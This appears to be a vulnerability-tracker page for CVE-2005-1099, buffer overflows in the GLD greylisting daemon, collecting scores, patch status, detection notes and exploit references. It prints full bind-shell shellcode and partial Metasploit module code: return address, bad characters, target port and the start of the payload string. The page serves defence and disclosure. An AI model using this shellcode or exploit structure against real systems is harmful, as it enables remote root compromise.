CVE-2005-1099
published 2005-04-12CVE-2005-1099: Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow…
PriorityP262critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
67.66%
99.2th percentile
Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | postfix-gld | < postfix-gld 1.5-1 (bookworm) | postfix-gld 1.5-1 (bookworm) |
| salim_gasmi | gld | — | — |
| salim_gasmi | gld | — | — |
| salim_gasmi | gld | — | — |
| salim_gasmi | gld | — | — |
| salim_gasmi | gld | — | — |
| salim_gasmi | gld | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh
- →Exploit targets TCP port 2525 (GLD greylisting daemon). Monitor for unexpected or malformed connections to this port, especially from non-Postfix sources. ↗
- →Exploit payload is delivered via the 'sender=' field followed by a 'client_address=' field padded with 300 repetitions of a return address. Detect anomalously large or malformed GLD protocol messages containing these fields. ↗
- →Successful exploitation results in a reverse/bind shell on TCP port 36864. Monitor for unexpected outbound or inbound connections on port 36864 from the GLD host. ↗
- →The exploit bad characters for payload encoding are null byte, newline, carriage return, space, and equals sign. IDS signatures should look for long binary strings in GLD protocol fields lacking these characters. ↗
- →The vulnerability resides in the HandleChild function in server.c of GLD 1.3 and 1.4. Process-level monitoring for crashes or unexpected child process spawning from the GLD daemon is advised. ↗
- ·The vulnerability is only exploitable when GLD is configured to listen on a network interface (not just localhost). Default or localhost-only deployments are not remotely exploitable. ↗
- ·The Metasploit module only includes a target for RedHat Linux 7.0 (Guinness) with a hardcoded return address (0xbfffa5d8). Exploitation against other distributions requires adjusted return addresses. ↗
- ·GLD 1.5-1 resolves this vulnerability in Debian. Ensure patched version is deployed. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2005-1099: postfix-gld - Multiple buffer overflows in the HandleChild function in server.c in Greylisting...
vendor_debian·2005·CVSS 10.0
CVE-2005-1099 [CRITICAL] CVE-2005-1099: postfix-gld - Multiple buffer overflows in the HandleChild function in server.c in Greylisting...
Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.
Scope: local
bookworm: resolved (fixed in 1.5-1)
bullseye: resolved (fixed in 1.5-1)
forky: resolved (fixed in 1.5-1)
sid: resolved (fixed in 1.5-1)
trixie: resolved (fixed in 1.5-1)
GHSA
GHSA-7vr7-48qp-h7jp: Multiple buffer overflows in the HandleChild function in server
ghsa_unreviewed·2022-05-01
CVE-2005-1099 [HIGH] GHSA-7vr7-48qp-h7jp: Multiple buffer overflows in the HandleChild function in server
Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.
OSV
CVE-2005-1099: Multiple buffer overflows in the HandleChild function in server
osv·2005-04-12·CVSS 10.0
CVE-2005-1099 [CRITICAL] CVE-2005-1099: Multiple buffer overflows in the HandleChild function in server
Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.
No detection rules found.
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)
exploitdb·2010-07-03
CVE-2005-1099 Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)
Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)
---
##
# $Id: gld_postfix.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Salim Gasmi
GLD '$Revision: 9669 $',
'Author' => [ 'patrick' ],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
[ 'URL', 'http://www.milw0rm.com/exploits/
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow
exploitdb·2005-04-12
CVE-2005-1099 Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow
Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow
---
// source: https://www.securityfocus.com/bid/13129/info
It is reported that GLD contains a buffer overflow vulnerability. This issue is due to a failure of the application to properly ensure that a fixed-size memory buffer is sufficiently large prior to copying user-supplied input data into it.
Remote attackers may exploit this vulnerability to cause arbitrary machine code to be executed in the context of the affected service. As the service is designed to be run as the superuser, remote attackers may gain superuser privileges on affected computers.
GLD version 1.4 is reportedly affected, but prior versions may also be affected.
/*
**
**
** 0x82-meOw-linuxer_forever - gld 1.4 remote overflow for
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)
exploitdb·2005-04-12
CVE-2005-1099 Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)
Salim Gasmi GLD (Greylisting Daemon) 1.0 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the Salim Gasmi
GLD '$Revision$',
'Author' => [ 'patrick' ],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20=",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(2525)
],
self.class
)
end
def exploit
connect
sploit = "sender="+ payload.encoded + "\r\n"
sploit << "client_address=" + [
Metasploit
GLD (Greylisting Daemon) Postfix Buffer Overflow
metasploit
GLD (Greylisting Daemon) Postfix Buffer Overflow
GLD (Greylisting Daemon) Postfix Buffer Overflow
This module exploits a stack buffer overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111339935903880&w=2http://marc.info/?l=bugtraq&m=111342432325670&w=2http://secunia.com/advisories/14941http://security.gentoo.org/glsa/glsa-200504-10.xmlhttp://securitytracker.com/alerts/2005/Apr/1013678.htmlhttp://www.gasmi.net/down/gld-historyhttp://www.osvdb.org/15492https://exchange.xforce.ibmcloud.com/vulnerabilities/20066http://marc.info/?l=bugtraq&m=111339935903880&w=2http://marc.info/?l=bugtraq&m=111342432325670&w=2http://secunia.com/advisories/14941http://security.gentoo.org/glsa/glsa-200504-10.xmlhttp://securitytracker.com/alerts/2005/Apr/1013678.htmlhttp://www.gasmi.net/down/gld-historyhttp://www.osvdb.org/15492https://exchange.xforce.ibmcloud.com/vulnerabilities/20066
2005-04-12
Published